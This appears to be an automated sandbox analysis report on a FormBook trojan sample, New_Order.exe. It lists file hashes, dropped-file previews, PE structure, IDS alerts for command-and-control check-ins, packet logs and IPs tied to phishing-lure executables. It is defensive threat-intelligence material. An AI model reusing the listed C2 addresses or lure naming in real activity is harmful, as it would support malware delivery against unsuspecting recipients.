                                                                      Sf6jgQc6Ww.exeGet hashmaliciousBrowse
                                                                      • 85.233.160.23
                                                                      winlog(1).exeGet hashmaliciousBrowse
                                                                      • 85.233.160.23
                                                                      payment list.xlsxGet hashmaliciousBrowse
                                                                      • 85.233.160.22
                                                                      cGLVytu1ps.exeGet hashmaliciousBrowse
                                                                      • 85.233.160.23
                                                                      shops.myshopify.comcorrect invoice.exeGet hashmaliciousBrowse
                                                                      • 23.227.38.74
                                                                      PP,Sporda.exeGet hashmaliciousBrowse
                                                                      • 23.227.38.74
                                                                      Purchase Order.exeGet hashmaliciousBrowse
                                                                      • 23.227.38.74
                                                                      PAYMENT INSTRUCTIONS COPY.exeGet hashmaliciousBrowse
                                                                      • 23.227.38.74
                                                                      New Order.exeGet hashmaliciousBrowse
                                                                      • 23.227.38.74
                                                                      slot Charges.exeGet hashmaliciousBrowse
                                                                      • 23.227.38.74
                                                                      WAkePI6vWufG5Bb.exeGet hashmaliciousBrowse
                                                                      • 23.227.38.74
                                                                      PO09641.exeGet hashmaliciousBrowse
                                                                      • 23.227.38.74
                                                                      PO#6275473, Shipping.exeGet hashmaliciousBrowse
                                                                      • 23.227.38.74
                                                                      4LkSpeVqKR.exeGet hashmaliciousBrowse
                                                                      • 23.227.38.74
                                                                      PO889876.pdf.exeGet hashmaliciousBrowse
                                                                      • 23.227.38.74
                                                                      Il nuovo ordine e nell'elenco allegato.exeGet hashmaliciousBrowse
                                                                      • 23.227.38.74
                                                                      Order Euro 890,000.exeGet hashmaliciousBrowse
                                                                      • 23.227.38.74
                                                                      winlog.exeGet hashmaliciousBrowse
                                                                      • 23.227.38.74
                                                                      products order pdf .exeGet hashmaliciousBrowse
                                                                      • 23.227.38.74
                                                                      REVISED ORDER.exeGet hashmaliciousBrowse
                                                                      • 23.227.38.74
                                                                      e9777bb4_by_Libranalysis.exeGet hashmaliciousBrowse
                                                                      • 23.227.38.74
                                                                      NEW ORDER.exeGet hashmaliciousBrowse
                                                                      • 23.227.38.74
                                                                      PROFORMA INVOICE210505133444.xlsxGet hashmaliciousBrowse
                                                                      • 23.227.38.74
                                                                      Quotation_05052021.Pdf.exeGet hashmaliciousBrowse
                                                                      • 23.227.38.74

                                                                      ASN

                                                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                      ARUBA-ASNIT4GGwmv0AJm.exeGet hashmaliciousBrowse
                                                                      • 62.149.142.170
                                                                      a3aa510e_by_Libranalysis.exeGet hashmaliciousBrowse
                                                                      • 62.149.128.40
                                                                      8D7A2AE1A479BBCA9229723C2308C564B7477791E047D.exeGet hashmaliciousBrowse
                                                                      • 188.213.167.248
                                                                      efubZxu50u.dllGet hashmaliciousBrowse
                                                                      • 80.211.33.13
                                                                      DcDVzchpHN.dllGet hashmaliciousBrowse
                                                                      • 80.211.33.13
                                                                      efubZxu50u.dllGet hashmaliciousBrowse
                                                                      • 80.211.33.13
                                                                      S1grVjDTSa.dllGet hashmaliciousBrowse
                                                                      • 80.211.33.13
                                                                      HG1fxDiIfH.dllGet hashmaliciousBrowse
                                                                      • 80.211.33.13
                                                                      DcDVzchpHN.dllGet hashmaliciousBrowse
                                                                      • 80.211.33.13
                                                                      S1grVjDTSa.dllGet hashmaliciousBrowse
                                                                      • 80.211.33.13
                                                                      Z6F68M8dUn.dllGet hashmaliciousBrowse
                                                                      • 80.211.33.13
                                                                      HG1fxDiIfH.dllGet hashmaliciousBrowse
                                                                      • 80.211.33.13
                                                                      Z6F68M8dUn.dllGet hashmaliciousBrowse
                                                                      • 80.211.33.13
                                                                      gunzipped.exeGet hashmaliciousBrowse
                                                                      • 80.88.87.202
                                                                      gunzipped.exeGet hashmaliciousBrowse
                                                                      • 80.88.87.202
                                                                      7EcAk8vh08.dllGet hashmaliciousBrowse
                                                                      • 80.211.33.13
                                                                      Pu7cgGrOOG.dllGet hashmaliciousBrowse
                                                                      • 80.211.33.13
                                                                      eA2oqiHTh5.dllGet hashmaliciousBrowse
                                                                      • 80.211.33.13
                                                                      7EcAk8vh08.dllGet hashmaliciousBrowse
                                                                      • 80.211.33.13
                                                                      Pu7cgGrOOG.dllGet hashmaliciousBrowse
                                                                      • 80.211.33.13
                                                                      TELEPOINTBG#CMA-CMG.exeGet hashmaliciousBrowse
                                                                      • 78.128.8.31
                                                                      #CMA-CMB.exeGet hashmaliciousBrowse
                                                                      • 78.128.8.31
                                                                      FACTURA 6475.exeGet hashmaliciousBrowse
                                                                      • 78.128.8.31
                                                                      generated order 677120.xlsmGet hashmaliciousBrowse
                                                                      • 217.174.152.36
                                                                      generated_check_9698936.xlsmGet hashmaliciousBrowse
                                                                      • 217.174.152.52
                                                                      purchase order 370149.xlsmGet hashmaliciousBrowse
                                                                      • 217.174.152.36
                                                                      copy of fax 04946.xlsmGet hashmaliciousBrowse
                                                                      • 217.174.152.36
                                                                      scan of order 2570.xlsmGet hashmaliciousBrowse
                                                                      • 217.174.152.52
                                                                      AWB-18267638920511_ES.exeGet hashmaliciousBrowse
                                                                      • 78.128.8.31
                                                                      export of payment 2993132.xlsmGet hashmaliciousBrowse
                                                                      • 217.174.152.52
                                                                      check 392553.xlsmGet hashmaliciousBrowse
                                                                      • 217.174.152.36
                                                                      FACTURA 6476.exeGet hashmaliciousBrowse
                                                                      • 78.128.8.31
                                                                      Zam#U00f3wienie-290421.85655463.exeGet hashmaliciousBrowse
                                                                      • 78.128.8.31
                                                                      PZnr10961754.exeGet hashmaliciousBrowse
                                                                      • 78.128.8.31
                                                                      Nieprawid#U0142owy IBAN.exeGet hashmaliciousBrowse
                                                                      • 78.128.8.31
                                                                      AWB-182676389205111_ES.exeGet hashmaliciousBrowse
                                                                      • 78.128.8.31
                                                                      xVvAobZvWU.exeGet hashmaliciousBrowse
                                                                      • 78.128.8.31
                                                                      FAKTURA I RACHUNKI.exeGet hashmaliciousBrowse
                                                                      • 78.128.8.31
                                                                      0AX4532QWSA.xlsxGet hashmaliciousBrowse
                                                                      • 217.174.152.38
                                                                      INV8222874744_20210111490395.xlsmGet hashmaliciousBrowse
                                                                      • 217.174.149.3
                                                                      AMAZON-02USNAVTECO_R1_10_05_2021,pdf.exeGet hashmaliciousBrowse
                                                                      • 13.58.50.133
                                                                      YDHhjjAEFbel88t.exeGet hashmaliciousBrowse
                                                                      • 99.83.175.80
                                                                      yU7RItYEQ9kCkZE.exeGet hashmaliciousBrowse
                                                                      • 99.83.175.80
                                                                      Shipment Document BL,INV and packing List.exeGet hashmaliciousBrowse
                                                                      • 52.58.78.16
                                                                      4xPBZai06p.dllGet hashmaliciousBrowse
                                                                      • 13.225.75.73
                                                                      0OyVQNXrTo.exeGet hashmaliciousBrowse
                                                                      • 3.142.167.54
                                                                      rAd00Nae9w.dllGet hashmaliciousBrowse
                                                                      • 13.225.75.73
                                                                      DOC24457188209927.exeGet hashmaliciousBrowse
                                                                      • 13.224.193.2
                                                                      user-invoice-8488888.docGet hashmaliciousBrowse
                                                                      • 104.192.141.1
                                                                      user-invoice-8488888.docGet hashmaliciousBrowse
                                                                      • 104.192.141.1
                                                                      ProForma Invoice 20210510.exeGet hashmaliciousBrowse
                                                                      • 13.113.228.117
                                                                      PO9448882.exeGet hashmaliciousBrowse
                                                                      • 18.219.49.238
                                                                      jjbxg8kh5X.exeGet hashmaliciousBrowse
                                                                      • 52.216.177.83
                                                                      4si5VtPNTe.exeGet hashmaliciousBrowse
                                                                      • 3.6.208.121
                                                                      latvia-order-051121_.docGet hashmaliciousBrowse
                                                                      • 52.219.129.63
                                                                      BANK-ACCOUNT. NUMBER.PDF.exeGet hashmaliciousBrowse
                                                                      • 3.16.197.4
                                                                      PRF00202156KMT.exeGet hashmaliciousBrowse
                                                                      • 3.16.197.4
                                                                      PP,Sporda.exeGet hashmaliciousBrowse
                                                                      • 44.227.76.166
                                                                      Report000042.htmGet hashmaliciousBrowse
                                                                      • 13.224.193.89
                                                                      Materialliste f#U00fcr Angebot.exeGet hashmaliciousBrowse
                                                                      • 3.16.197.4

                                                                      JA3 Fingerprints

                                                                      No context

                                                                      Dropped Files

                                                                      No context

                                                                      Created / dropped Files

                                                                      C:\Users\user\AppData\Local\Temp\8n7cv9pwr2kwl9
                                                                      Process:C:\Users\user\Desktop\New_Order.exe
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):7173
                                                                      Entropy (8bit):7.643378493516249
                                                                      Encrypted:false
                                                                      SSDEEP:192:kWsIQunuTrpLAHF5te0ulc1fFpvHnMQflsQB1:kWzJuZGFwl2Njr1
                                                                      MD5:3C64776F75B97A4C93D6D618B56A6F34
                                                                      SHA1:621734AAB7D0C78F31E2710792CED1ECA8A25A42
                                                                      SHA-256:15C34F8796FADC9344F3F00A92ABF56576290325A80CA2E1FAE1DFC472FE4AE3
                                                                      SHA-512:8F3B4AA2178F4439DAF14E4CD05BC9D0CFCC21FA2F8940A163EE11E95A6608152D7B52867F69AF0A9DFF591191A1743C84F46CE0961D9C6983620AB3565208E4
                                                                      Malicious:false
                                                                      Reputation:low
                                                                      Preview: f..73...gQG.y.K..W..i..CG.y$A...k.S.IcT.k..K....W).JK...GC...pQ.Jo.a......v.G.*.V....W..FLB...{.1...P~.J..a...l*..Q.....Bg[.6<....v{...0V...j.k.F4Z...v.....p.a...yF.BT)....QB.F......D...l..vkWP... F..g..V.B...v[..BP.p^.J..d..L.!v..p...p4..|.....F{O..@....J.{.V4*...7.ZPF.n.......BT.!....B.V...j..dFtZ."...G....p..bw[<.......[.PB.F...J..Cb.....Tj!v{....g..J...r.....P{[.4.@...l...8V4...k.<ZPj..t......V.!...n.B..z.....XFt..........twW2.......[.NTB......OP..fB....*.!tg.....v.........bH.LoOO@.4.%J.{.V4*...9......yopVy.ICB...3T.....'.$...1...BgA....twY....v...|..../...J..#,..{.V.!p{.c..b..........$.....4.@j..twW.0.,...[;.<B@.......P..fDa..K..Z.*H!...g.V|.....;cLBPbH.Lo...........*.....W..PFLlE.g.....TCW..a.....f.o.....Y.....bs.[^4.@.l...,z<.SW[i.fE...P.....O.Z.F...N.B<....SS..AtZP..B/]...~</..w[2...d/.KVh.h=cGG...P..vs.\...L..#.....T.7...,..#..G..@6.F......dx.SS[;A<B@.....L........KRF.Z..:..V...3OO.9H.*^...Ys9.I.!.h'.....N.*\..{[w...FyH.~)......
                                                                      C:\Users\user\AppData\Local\Temp\nshC36E.tmp\a9g5j8lkcs3.dll
                                                                      Process:C:\Users\user\Desktop\New_Order.exe
                                                                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                      Category:dropped
                                                                      Size (bytes):4096
                                                                      Entropy (8bit):4.26548315942308
                                                                      Encrypted:false
                                                                      SSDEEP:48:i1kuQn1ASkT3Jd95EiKT0RlsgmoKbFThbmhnheDKbgXWoqsScz5dXmeS:W4n1ASkP3KgRlsaKZnKcXWoq7czQ
                                                                      MD5:857951253D45E28242D6EFFFF15D2BE6
                                                                      SHA1:94BCE2130D6BC960C42023FCFAEC4CFE1578905B
                                                                      SHA-256:FE179C45D6115D5D7238857C0DFA7D48E24182CF4AC2C9365925DC4EB4BCDA4E
                                                                      SHA-512:9436F62D193ACD3C738278AFF98ED0E2EB2AB490D7BE46E04C8B2282E84E5027CE3DCCAEF2C531313BB17E7285D290BC2736850E7D267F3E4ABC52FBCA8E8429
                                                                      Malicious:true
                                                                      Antivirus:
                                                                      • Antivirus: ReversingLabs, Detection: 45%
                                                                      Reputation:low
                                                                      Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...............................................................................PE..L......`...........!......................... ...............................@....................................... ..T....!....................................... ............................................... ...............................text............................... ..`.rdata....... ......................@..@.data... ....0......................@...................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                      C:\Users\user\AppData\Local\Temp\p4uvvpfyo5r9igyk
                                                                      Process:C:\Users\user\Desktop\New_Order.exe
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):164864
                                                                      Entropy (8bit):7.998945413738887
                                                                      Encrypted:true
                                                                      SSDEEP:3072:Tbz4IUuyr/iFThKRJq8haAGTnGhqPzj9C+a446GjKcAvBMQ4CNel:TbzR/ACYRJq8uTGAli4EKVvBMSkl
                                                                      MD5:1842785601112C137E81EA60E9504A13
                                                                      SHA1:904245EBB63CF1FF6DF3461026C179A7B1E9083B
                                                                      SHA-256:CE4A558A3F3B767B8E041794A63587145306752BCB2C990200CD6C48DB3C610E
                                                                      SHA-512:19A0EF1E359E041B0C6E6FEC991E26CB16BFDDC705F8A1C63D3F4C5B0A94A8B1BD1CC935659E637E446F3132A2EF440B38CD90716DBB950169C591337B3218D0
                                                                      Malicious:false
                                                                      Reputation:low
                                                                      Preview: ..(..g.....s.V@..9n.h.9.#..W....".}.......Q.Q....8z.{jyX.i.T-....6D...@...U...D.....c.|9.e.R1%..*.MG..H!1..@..^_...uF.......%.!.:~d.......^..>.d.L)..3..*...J(W...i..............9.:.u...u.2.?h..N.;P.;.].M......B.r..<Qy.S.g..Uf&..6.....Y....-R3..|U../.3.p.~x.)*={)7g......x.=...T..<.O+.2..`....RgOM.(4.G\..j..c.&.Tb.c..s...~..9v.aqT....5..2..\.:.S.O....S.2xi{.~OM.....*g..\...x.?.'N....\.I....H...2.&...Z.n.0.....!.1.Td{'{;p.}..%.$aZ.Wo......r.*.fn.............q..dq..V.....W@mD`].f-.v.E."XUgL..7.R......J.."....la.z..6....Zu.:.S+.]K..~/.Hy.e.V...|.>,f.9...&....\!......0..w?U...2O..2l...5..<..=N..GV.y.......Q...%9..&k..%.YMm7....(.p....z4Od....T$....$k....04....@7......OY..!.?.....>....xT.%.W.Q. ....?."..m....@...(..!..-.WpRF.30c).....C;.U..._l......68...I.G.y...w?b...B4...f.}....C.V.LtTvb....T.ey.G.'..O..CH.........S.$N..aP..h.....i......]t..._.....j........4.wp....[..=8.lb..?D.. .Q..Q..PU.^;....pU):,...d=...w......F..4...3...r.F.X..h.?..

                                                                      Static File Info

                                                                      General

                                                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                      Entropy (8bit):7.551360925759815
                                                                      TrID:
                                                                      • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                                                      • DOS Executable Generic (2002/1) 0.02%
                                                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                      File name:New_Order.exe
                                                                      File size:344003
                                                                      MD5:74e4eb9afbf8f9c9b285a46ced831979
                                                                      SHA1:8d65df9dc971c859f0a86a158d9576f528603410
                                                                      SHA256:68c72cdcc504fcbffe3d6219cbeeed9586e0e362f073070eda7c0b4ed962d14a
                                                                      SHA512:14c0dd32728a4e0a7cc1ceead7f78773e599000facf25dddbcd00404674ca97742784734433d5a858ca0063b57e678c599d664a16183798b4e607ff3557b0968
                                                                      SSDEEP:6144:f9X0Gni/KtKNZIcxjbzR/ACYRJq8uTGAli4EKVvBMSk6:p0MtKNZlXR/36JQTXvvV5MI
                                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1)..PG..PG..PG.*_...PG..PF.IPG.*_...PG..sw..PG..VA..PG.Rich.PG.........PE..L...".$_.................f...|......H3............@

                                                                      File Icon

                                                                      Icon Hash:960d4b6e0f3e3642

                                                                      Static PE Info

                                                                      General

                                                                      Entrypoint:0x403348
                                                                      Entrypoint Section:.text
                                                                      Digitally signed:false
                                                                      Imagebase:0x400000
                                                                      Subsystem:windows gui
                                                                      Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                                                                      DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                                      Time Stamp:0x5F24D722 [Sat Aug 1 02:44:50 2020 UTC]
                                                                      TLS Callbacks:
                                                                      CLR (.Net) Version:
                                                                      OS Version Major:4
                                                                      OS Version Minor:0
                                                                      File Version Major:4
                                                                      File Version Minor:0
                                                                      Subsystem Version Major:4
                                                                      Subsystem Version Minor:0
                                                                      Import Hash:ced282d9b261d1462772017fe2f6972b

                                                                      Entrypoint Preview

                                                                      Instruction
                                                                      sub esp, 00000184h
                                                                      push ebx
                                                                      push esi
                                                                      push edi
                                                                      xor ebx, ebx
                                                                      push 00008001h
                                                                      mov dword ptr [esp+18h], ebx
                                                                      mov dword ptr [esp+10h], 0040A198h
                                                                      mov dword ptr [esp+20h], ebx
                                                                      mov byte ptr [esp+14h], 00000020h
                                                                      call dword ptr [004080B8h]
                                                                      call dword ptr [004080BCh]
                                                                      and eax, BFFFFFFFh
                                                                      cmp ax, 00000006h
                                                                      mov dword ptr [0042F42Ch], eax
                                                                      je 00007FE4D08F1223h
                                                                      push ebx
                                                                      call 00007FE4D08F4386h
                                                                      cmp eax, ebx
                                                                      je 00007FE4D08F1219h
                                                                      push 00000C00h
                                                                      call eax
                                                                      mov esi, 004082A0h
                                                                      push esi
                                                                      call 00007FE4D08F4302h
                                                                      push esi
                                                                      call dword ptr [004080CCh]
                                                                      lea esi, dword ptr [esi+eax+01h]
                                                                      cmp byte ptr [esi], bl
                                                                      jne 00007FE4D08F11FDh
                                                                      push 0000000Bh
                                                                      call 00007FE4D08F435Ah
                                                                      push 00000009h
                                                                      call 00007FE4D08F4353h
                                                                      push 00000007h
                                                                      mov dword ptr [0042F424h], eax
                                                                      call 00007FE4D08F4347h
                                                                      cmp eax, ebx
                                                                      je 00007FE4D08F1221h
                                                                      push 0000001Eh
                                                                      call eax
                                                                      test eax, eax
                                                                      je 00007FE4D08F1219h
                                                                      or byte ptr [0042F42Fh], 00000040h
                                                                      push ebp
                                                                      call dword ptr [00408038h]
                                                                      push ebx
                                                                      call dword ptr [00408288h]
                                                                      mov dword ptr [0042F4F8h], eax
                                                                      push ebx
                                                                      lea eax, dword ptr [esp+38h]
                                                                      push 00000160h
                                                                      push eax
                                                                      push ebx
                                                                      push 00429850h
                                                                      call dword ptr [0040816Ch]
                                                                      push 0040A188h

                                                                      Rich Headers

                                                                      Programming Language:
                                                                      • [EXP] VC++ 6.0 SP5 build 8804

                                                                      Data Directories

                                                                      NameVirtual AddressVirtual Size Is in Section
                                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0x85440xa0.rdata
                                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x380000x21248.rsrc
                                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_IAT0x80000x29c.rdata
                                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                      Sections

                                                                      NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                      .text0x10000x64570x6600False0.66823682598data6.43498570321IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                      .rdata0x80000x13800x1400False0.4625data5.26100389731IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                      .data0xa0000x255380x600False0.463541666667data4.133728555IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                      .ndata0x300000x80000x0False0empty0.0IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                      .rsrc0x380000x212480x21400False0.430987135808data6.43392115595IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                      Resources

                                                                      NameRVASizeTypeLanguageCountry
                                                                      RT_ICON0x382800x10828dataEnglishUnited States
                                                                      RT_ICON0x48aa80x849dPNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States
                                                                      RT_ICON0x50f480x4228dBase IV DBT of \200.DBF, blocks size 0, block length 16384, next free block index 40, next free block 4293848814, next used block 4294638330EnglishUnited States
                                                                      RT_ICON0x551700x25a8dBase IV DBT of `.DBF, block length 9216, next free block index 40, next free block 4294046193, next used block 4294638330EnglishUnited States
                                                                      RT_ICON0x577180x10a8dBase IV DBT of @.DBF, block length 4096, next free block index 40, next free block 4294309365, next used block 4294375158EnglishUnited States
                                                                      RT_ICON0x587c00x468GLS_BINARY_LSB_FIRSTEnglishUnited States
                                                                      RT_DIALOG0x58c280x100dataEnglishUnited States
                                                                      RT_DIALOG0x58d280x11cdataEnglishUnited States
                                                                      RT_DIALOG0x58e480x60dataEnglishUnited States
                                                                      RT_GROUP_ICON0x58ea80x5adataEnglishUnited States
                                                                      RT_MANIFEST0x58f080x340XML 1.0 document, ASCII text, with very long lines, with no line terminatorsEnglishUnited States

                                                                      Imports

                                                                      DLLImport
                                                                      ADVAPI32.dllRegCreateKeyExA, RegEnumKeyA, RegQueryValueExA, RegSetValueExA, RegCloseKey, RegDeleteValueA, RegDeleteKeyA, AdjustTokenPrivileges, LookupPrivilegeValueA, OpenProcessToken, SetFileSecurityA, RegOpenKeyExA, RegEnumValueA
                                                                      SHELL32.dllSHGetFileInfoA, SHFileOperationA, SHGetPathFromIDListA, ShellExecuteExA, SHGetSpecialFolderLocation, SHBrowseForFolderA
                                                                      ole32.dllIIDFromString, OleInitialize, OleUninitialize, CoCreateInstance, CoTaskMemFree
                                                                      COMCTL32.dllImageList_Create, ImageList_Destroy, ImageList_AddMasked
                                                                      USER32.dllSetClipboardData, CharPrevA, CallWindowProcA, PeekMessageA, DispatchMessageA, MessageBoxIndirectA, GetDlgItemTextA, SetDlgItemTextA, GetSystemMetrics, CreatePopupMenu, AppendMenuA, TrackPopupMenu, FillRect, EmptyClipboard, LoadCursorA, GetMessagePos, CheckDlgButton, GetSysColor, SetCursor, GetWindowLongA, SetClassLongA, SetWindowPos, IsWindowEnabled, GetWindowRect, GetSystemMenu, EnableMenuItem, RegisterClassA, ScreenToClient, EndDialog, GetClassInfoA, SystemParametersInfoA, CreateWindowExA, ExitWindowsEx, DialogBoxParamA, CharNextA, SetTimer, DestroyWindow, CreateDialogParamA, SetForegroundWindow, SetWindowTextA, PostQuitMessage, SendMessageTimeoutA, ShowWindow, wsprintfA, GetDlgItem, FindWindowExA, IsWindow, GetDC, SetWindowLongA, LoadImageA, InvalidateRect, ReleaseDC, EnableWindow, BeginPaint, SendMessageA, DefWindowProcA, DrawTextA, GetClientRect, EndPaint, IsWindowVisible, CloseClipboard, OpenClipboard
                                                                      GDI32.dllSetBkMode, SetBkColor, GetDeviceCaps, CreateFontIndirectA, CreateBrushIndirect, DeleteObject, SetTextColor, SelectObject
                                                                      KERNEL32.dllGetExitCodeProcess, WaitForSingleObject, GetProcAddress, GetSystemDirectoryA, WideCharToMultiByte, MoveFileExA, ReadFile, GetTempFileNameA, WriteFile, RemoveDirectoryA, CreateProcessA, CreateFileA, GetLastError, CreateThread, CreateDirectoryA, GlobalUnlock, GetDiskFreeSpaceA, GlobalLock, SetErrorMode, GetVersion, lstrcpynA, GetCommandLineA, GetTempPathA, lstrlenA, SetEnvironmentVariableA, ExitProcess, GetWindowsDirectoryA, GetCurrentProcess, GetModuleFileNameA, CopyFileA, GetTickCount, Sleep, GetFileSize, GetFileAttributesA, SetCurrentDirectoryA, SetFileAttributesA, GetFullPathNameA, GetShortPathNameA, MoveFileA, CompareFileTime, SetFileTime, SearchPathA, lstrcmpiA, lstrcmpA, CloseHandle, GlobalFree, GlobalAlloc, ExpandEnvironmentStringsA, LoadLibraryExA, FreeLibrary, lstrcpyA, lstrcatA, FindClose, MultiByteToWideChar, WritePrivateProfileStringA, GetPrivateProfileStringA, SetFilePointer, GetModuleHandleA, FindNextFileA, FindFirstFileA, DeleteFileA, MulDiv

                                                                      Possible Origin

                                                                      Language of compilation systemCountry where language is spokenMap
                                                                      EnglishUnited States

                                                                      Network Behavior

                                                                      Snort IDS Alerts

                                                                      TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                      05/12/21-06:10:52.777667TCP1201ATTACK-RESPONSES 403 Forbidden804971675.2.115.196192.168.2.5
                                                                      05/12/21-06:10:57.964155TCP2031453ET TROJAN FormBook CnC Checkin (GET)4971780192.168.2.591.148.168.141
                                                                      05/12/21-06:10:57.964155TCP2031449ET TROJAN FormBook CnC Checkin (GET)4971780192.168.2.591.148.168.141
                                                                      05/12/21-06:10:57.964155TCP2031412ET TROJAN FormBook CnC Checkin (GET)4971780192.168.2.591.148.168.141
                                                                      05/12/21-06:10:58.051840TCP1201ATTACK-RESPONSES 403 Forbidden804971791.148.168.141192.168.2.5
                                                                      05/12/21-06:11:08.305754TCP2031453ET TROJAN FormBook CnC Checkin (GET)4971880192.168.2.562.149.189.71
                                                                      05/12/21-06:11:08.305754TCP2031449ET TROJAN FormBook CnC Checkin (GET)4971880192.168.2.562.149.189.71
                                                                      05/12/21-06:11:08.305754TCP2031412ET TROJAN FormBook CnC Checkin (GET)4971880192.168.2.562.149.189.71
                                                                      05/12/21-06:11:13.647635TCP1201ATTACK-RESPONSES 403 Forbidden804971923.227.38.74192.168.2.5
                                                                      05/12/21-06:11:18.796605TCP2031453ET TROJAN FormBook CnC Checkin (GET)4972080192.168.2.585.233.160.22
                                                                      05/12/21-06:11:18.796605TCP2031449ET TROJAN FormBook CnC Checkin (GET)4972080192.168.2.585.233.160.22
                                                                      05/12/21-06:11:18.796605TCP2031412ET TROJAN FormBook CnC Checkin (GET)4972080192.168.2.585.233.160.22
                                                                      05/12/21-06:11:30.171286TCP2031453ET TROJAN FormBook CnC Checkin (GET)4972580192.168.2.58.210.40.49
                                                                      05/12/21-06:11:30.171286TCP2031449ET TROJAN FormBook CnC Checkin (GET)4972580192.168.2.58.210.40.49
                                                                      05/12/21-06:11:30.171286TCP2031412ET TROJAN FormBook CnC Checkin (GET)4972580192.168.2.58.210.40.49
                                                                      05/12/21-06:11:45.772072TCP2031453ET TROJAN FormBook CnC Checkin (GET)4972780192.168.2.534.102.136.180
                                                                      05/12/21-06:11:45.772072TCP2031449ET TROJAN FormBook CnC Checkin (GET)4972780192.168.2.534.102.136.180
                                                                      05/12/21-06:11:45.772072TCP2031412ET TROJAN FormBook CnC Checkin (GET)4972780192.168.2.534.102.136.180
                                                                      05/12/21-06:11:45.909532TCP1201ATTACK-RESPONSES 403 Forbidden804972734.102.136.180192.168.2.5

                                                                      Network Port Distribution

                                                                      TCP Packets

                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                      May 12, 2021 06:10:52.578253031 CEST4971680192.168.2.575.2.115.196
                                                                      May 12, 2021 06:10:52.618907928 CEST804971675.2.115.196192.168.2.5
                                                                      May 12, 2021 06:10:52.620045900 CEST4971680192.168.2.575.2.115.196
                                                                      May 12, 2021 06:10:52.620214939 CEST4971680192.168.2.575.2.115.196
                                                                      May 12, 2021 06:10:52.660700083 CEST804971675.2.115.196192.168.2.5
                                                                      May 12, 2021 06:10:52.777667046 CEST804971675.2.115.196192.168.2.5
                                                                      May 12, 2021 06:10:52.777733088 CEST804971675.2.115.196192.168.2.5
                                                                      May 12, 2021 06:10:52.778031111 CEST4971680192.168.2.575.2.115.196
                                                                      May 12, 2021 06:10:52.778270006 CEST4971680192.168.2.575.2.115.196
                                                                      May 12, 2021 06:10:52.807538986 CEST804971675.2.115.196192.168.2.5
                                                                      May 12, 2021 06:10:52.807683945 CEST4971680192.168.2.575.2.115.196
                                                                      May 12, 2021 06:10:52.818757057 CEST804971675.2.115.196192.168.2.5
                                                                      May 12, 2021 06:10:57.887156010 CEST4971780192.168.2.591.148.168.141
                                                                      May 12, 2021 06:10:57.963726997 CEST804971791.148.168.141192.168.2.5
                                                                      May 12, 2021 06:10:57.963977098 CEST4971780192.168.2.591.148.168.141
                                                                      May 12, 2021 06:10:57.964154959 CEST4971780192.168.2.591.148.168.141
                                                                      May 12, 2021 06:10:58.044265032 CEST804971791.148.168.141192.168.2.5
                                                                      May 12, 2021 06:10:58.051840067 CEST804971791.148.168.141192.168.2.5
                                                                      May 12, 2021 06:10:58.051858902 CEST804971791.148.168.141192.168.2.5
                                                                      May 12, 2021 06:10:58.052031040 CEST4971780192.168.2.591.148.168.141
                                                                      May 12, 2021 06:10:58.052119970 CEST4971780192.168.2.591.148.168.141
                                                                      May 12, 2021 06:10:58.128576040 CEST804971791.148.168.141192.168.2.5
                                                                      May 12, 2021 06:11:08.246844053 CEST4971880192.168.2.562.149.189.71
                                                                      May 12, 2021 06:11:08.305356979 CEST804971862.149.189.71192.168.2.5
                                                                      May 12, 2021 06:11:08.305533886 CEST4971880192.168.2.562.149.189.71
                                                                      May 12, 2021 06:11:08.305753946 CEST4971880192.168.2.562.149.189.71
                                                                      May 12, 2021 06:11:08.362505913 CEST804971862.149.189.71192.168.2.5
                                                                      May 12, 2021 06:11:08.363512993 CEST804971862.149.189.71192.168.2.5
